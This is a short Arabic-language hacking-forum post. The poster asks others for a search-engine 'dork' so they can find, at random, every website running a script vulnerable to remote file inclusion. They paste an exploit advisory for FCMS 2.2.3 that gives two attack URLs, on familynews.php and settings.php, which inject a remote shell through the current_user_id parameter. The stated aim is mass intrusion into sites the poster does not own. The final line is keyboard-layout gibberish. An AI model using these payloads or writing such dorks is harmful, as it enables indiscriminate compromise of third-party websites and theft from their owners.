السلام عليكم
اخواني انا حصلت ثغرة فايل انكلود ولا عرفت كيف اطلع الدورك لهذا الثغره لاني ابي ابحث بحث عشوائي لكل المواقع الي
مركبه هالسكربت المصاب ياليت تقولون لي كيف اطلع الدورك لها لاني دخلت الثغرة ولا حصلت لها دورك
مثال على ثغرة فايل انكلود الي ماحصلت فيها الدووورك
كود:
[x] Exploit Title: [FCMS_2.2.3 Remote File Inclusion ]
[x] Date: 10-9-2010]
[x] Author: LoSt.HaCkEr ~ aDaM_TRoJaN
[x] Software Link: [http://www.familycms.com/getstarted.php]
[x] Version: [v 2.2.3 ]
[x]Tested on: [Windows XP]
[x] CVE :
[x] My E-MaIl:LoSt.HaCkEr[at]HaCkEr[dot]Ps
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[x]Exploit: http://target/FCMS_2.2.3/FCMS_2.2.3/familynews.php?current_user_id=[shell]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[x]Exploit: http://target/FCMS_2.2.3/FCMS_2.2.3/settings.php?current_user_id=[SHeLL]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[x]Greetings: No Greet
ll;k 'vdrm luvtm ],,,,v; eyvm vdl,j thdg hk;g,] Remote File Inclusion